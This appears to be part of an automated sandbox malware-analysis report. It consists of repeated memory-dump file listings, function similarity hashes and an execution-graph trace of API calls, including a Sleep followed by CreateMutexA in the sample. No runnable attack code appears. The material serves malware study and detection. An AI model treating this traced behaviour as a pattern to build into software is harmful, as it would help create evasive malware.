                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                                                                                                                            • Instruction ID: da7243ee1f940096ed28c2dd433500c0dcf86598e6cb04ddb1c8fe15205662c5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2E08C32A21228EBCB14EB98C904A8AF7ECFB4AB01B650096F501D3151C270DF00C7D0
                                                                                                                                                                                                                                                                            Function 00052EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 57040152-0
                                                                                                                                                                                                                                                                            • Opcode ID: 73c4790e5db93271ec562cbd445c16afb12c923f29862d523ef878e682105e28
                                                                                                                                                                                                                                                                            • Instruction ID: 0e887f780b3cd126549a91179a53dbd9cc72776148c04069999b0221ad8702cb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73c4790e5db93271ec562cbd445c16afb12c923f29862d523ef878e682105e28
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4A1E0B0A017159FEB20DB74C944BABB7E9FF15351F048529EC16D7282EB35EA08CB91
                                                                                                                                                                                                                                                                            Function 0008CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                            • Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                                                                                            • Instruction ID: 7f5f487cca1cc5536369cb1e0ee79ab529e00db0fdc3bd1797757d154b9d6e49
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B102329046459FEB25AF28C881FEEBBF5FF55350F14816AE895EB242D6349D01CB70
                                                                                                                                                                                                                                                                            Function 0006BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2150495137.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150171763.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150495137.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150804554.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150890075.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2150919180.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151162610.000000000021C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151190617.000000000021E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151232379.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151289980.000000000024D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151319542.000000000024E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151399260.000000000025E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151427420.000000000025F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151502289.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151528684.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151551208.0000000000274000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151604752.0000000000275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151642466.000000000027D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151662777.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151680680.0000000000284000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151699291.0000000000289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151726942.000000000029E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151748641.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151768479.00000000002A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151786460.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151805122.00000000002AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151825913.00000000002B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151852238.00000000002B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151874517.00000000002B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151901567.00000000002C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151928483.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151956717.00000000002CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151979173.00000000002D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2151999880.00000000002D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152022406.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152050708.00000000002E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.00000000002E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152072352.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152136326.0000000000337000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152160407.0000000000338000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152183065.000000000034C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152203849.000000000034D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152224214.000000000034E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152248990.0000000000353000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152269027.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152290652.0000000000363000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2152309411.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                                                                                                            • Opcode ID: b84cae77136d8fc569516f5c3990188bf16cd89fc45d7ef0c7c3354cefc255ba
                                                                                                                                                                                                                                                                            • Instruction ID: fa0e8a2299ba8f4ebaa2b2d5d88131debf94ec79954e7eea08c93667e26e2e36
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b84cae77136d8fc569516f5c3990188bf16cd89fc45d7ef0c7c3354cefc255ba
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58211D71A00219AFEF00EBA4D895DFEB7BAEF08710F500425F501A7252DB349E419BA0

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:0.9%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                                                            Total number of Nodes:1881
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:15
                                                                                                                                                                                                                                                                            execution_graph 9882 fa9ef0 9883 fa9f0c 9882->9883 9886 fac68b 9883->9886 9885 fa9f17 9889 fac3d5 9886->9889 9888 fac69b 9888->9885 9890 fac3eb 9889->9890 9891 fac3e1 9889->9891 9890->9888 9892 fac39e 9891->9892 9893 fac3be 9891->9893 9892->9890 9898 faccd5 9892->9898 9902 facd0a 9893->9902 9896 fac3d0 9896->9888 9899 facce3 InitializeCriticalSectionEx 9898->9899 9901 fac3b7 9898->9901 9899->9901 9901->9888 9903 facd1f RtlInitializeConditionVariable 9902->9903 9903->9896 9904 fd44f2 9905 fd450c 9904->9905 9906 fd44ff 9904->9906 9908 fd4518 9905->9908 9909 fc75f6 __dosmaperr RtlAllocateHeap 9905->9909 9907 fc75f6 __dosmaperr RtlAllocateHeap 9906->9907 9910 fd4504 9907->9910 9911 fd4539 9909->9911 9912 fc6c5a ___std_exception_copy RtlAllocateHeap 9911->9912 9912->9910 9913 f96ae9 9914 f96b01 9913->9914 9915 fa80c0 RtlAllocateHeap 9914->9915 9918 f96bbd shared_ptr 9914->9918 9916 f96bac 9915->9916 9921 fa9280 9916->9921 9919 fa80c0 RtlAllocateHeap 9918->9919 9920 f96ce3 shared_ptr std::future_error::future_error 9919->9920 9922 fa9294 9921->9922 9925 fa92a5 __cftof 9922->9925 9926 fa94e0 9922->9926 9924 fa932b 9924->9918 9925->9918 9927 fa950b 9926->9927 9928 fa9619 9926->9928 9932 fa9579 9927->9932 9933 fa9552 9927->9933 9929 fa9270 RtlAllocateHeap 9928->9929 9930 fa961e 9929->9930 9931 f92480 RtlAllocateHeap 9930->9931 9939 fa9563 __cftof 9931->9939 9937 fad3e2 RtlAllocateHeap 9932->9937 9932->9939 9933->9930 9934 fa955d 9933->9934 9936 fad3e2 RtlAllocateHeap 9934->9936 9935 fc6c6a RtlAllocateHeap 9938 fa9628 shared_ptr 9935->9938 9936->9939 9937->9939 9938->9924 9939->9935 9940 fa95e1 shared_ptr __cftof 9939->9940 9940->9924 9941 f918e0 9942 fa80c0 RtlAllocateHeap 9941->9942 9943 f918f1 9942->9943 9946 fad64e 9943->9946 9949 fad621 9946->9949 9950 fad630 9949->9950 9951 fad637 9949->9951 9955 fc988e 9950->9955 9958 fc98fa 9951->9958 9954 f918fb 9956 fc98fa RtlAllocateHeap 9955->9956 9957 fc98a0 9956->9957 9957->9954 9961 fc9630 9958->9961 9960 fc992b 9960->9954 9962 fc963c __dosmaperr 9961->9962 9965 fc968b 9962->9965 9964 fc9657 9964->9960 9966 fc96a7 9965->9966 9968 fc971e __dosmaperr 9965->9968 9967 fc96fe 9966->9967 9966->9968 9975 fcedf6 9966->9975 9967->9968 9970 fcedf6 RtlAllocateHeap 9967->9970 9968->9964 9972 fc9714 9970->9972 9971 fc96f4 9973 fcadf5 __freea RtlAllocateHeap 9971->9973 9974 fcadf5 __freea RtlAllocateHeap 9972->9974 9973->9967 9974->9968 9976 fcee1e 9975->9976 9977 fcee03 9975->9977 9979 fcee2d 9976->9979 9984 fd4fdc 9976->9984 9977->9976 9978 fcee0f 9977->9978 9980 fc75f6 __dosmaperr RtlAllocateHeap 9978->9980 9991 fd500f 9979->9991 9983 fcee14 __cftof 9980->9983 9983->9971 9985 fd4ffc 9984->9985 9986 fd4fe7 9984->9986 9985->9979 9987 fc75f6 __dosmaperr RtlAllocateHeap 9986->9987 9988 fd4fec 9987->9988 9989 fc6c5a ___std_exception_copy RtlAllocateHeap 9988->9989 9990 fd4ff7 9989->9990 9990->9979 9992 fd501c 9991->9992 9993 fd5027 9991->9993 10000 fcb04b 9992->10000 9995 fd502f 9993->9995 9999 fd5038 __dosmaperr 9993->9999 9997 fcadf5 __freea RtlAllocateHeap 9995->9997 9996 fd5024 9996->9983 9997->9996 9998 fc75f6 __dosmaperr RtlAllocateHeap 9998->9996 9999->9996 9999->9998 10003 fcb059 __dosmaperr 10000->10003 10001 fc75f6 __dosmaperr RtlAllocateHeap 10002 fcb087 10001->10002 10002->9996 10003->10001 10003->10002 10047 f99adc 10049 f99aea shared_ptr 10047->10049 10048 f9a917 10050 f9a953 Sleep CreateMutexA 10048->10050 10051 fc6c6a RtlAllocateHeap 10048->10051 10049->10048 10052 f99b4b shared_ptr 10049->10052 10053 f9a98e 10050->10053 10051->10050 10054 f99b59 10052->10054 10055 f99b65 10052->10055 10058 fa80c0 RtlAllocateHeap 10054->10058 10074 fa7a00 10055->10074 10057 f99b74 10088 f95c10 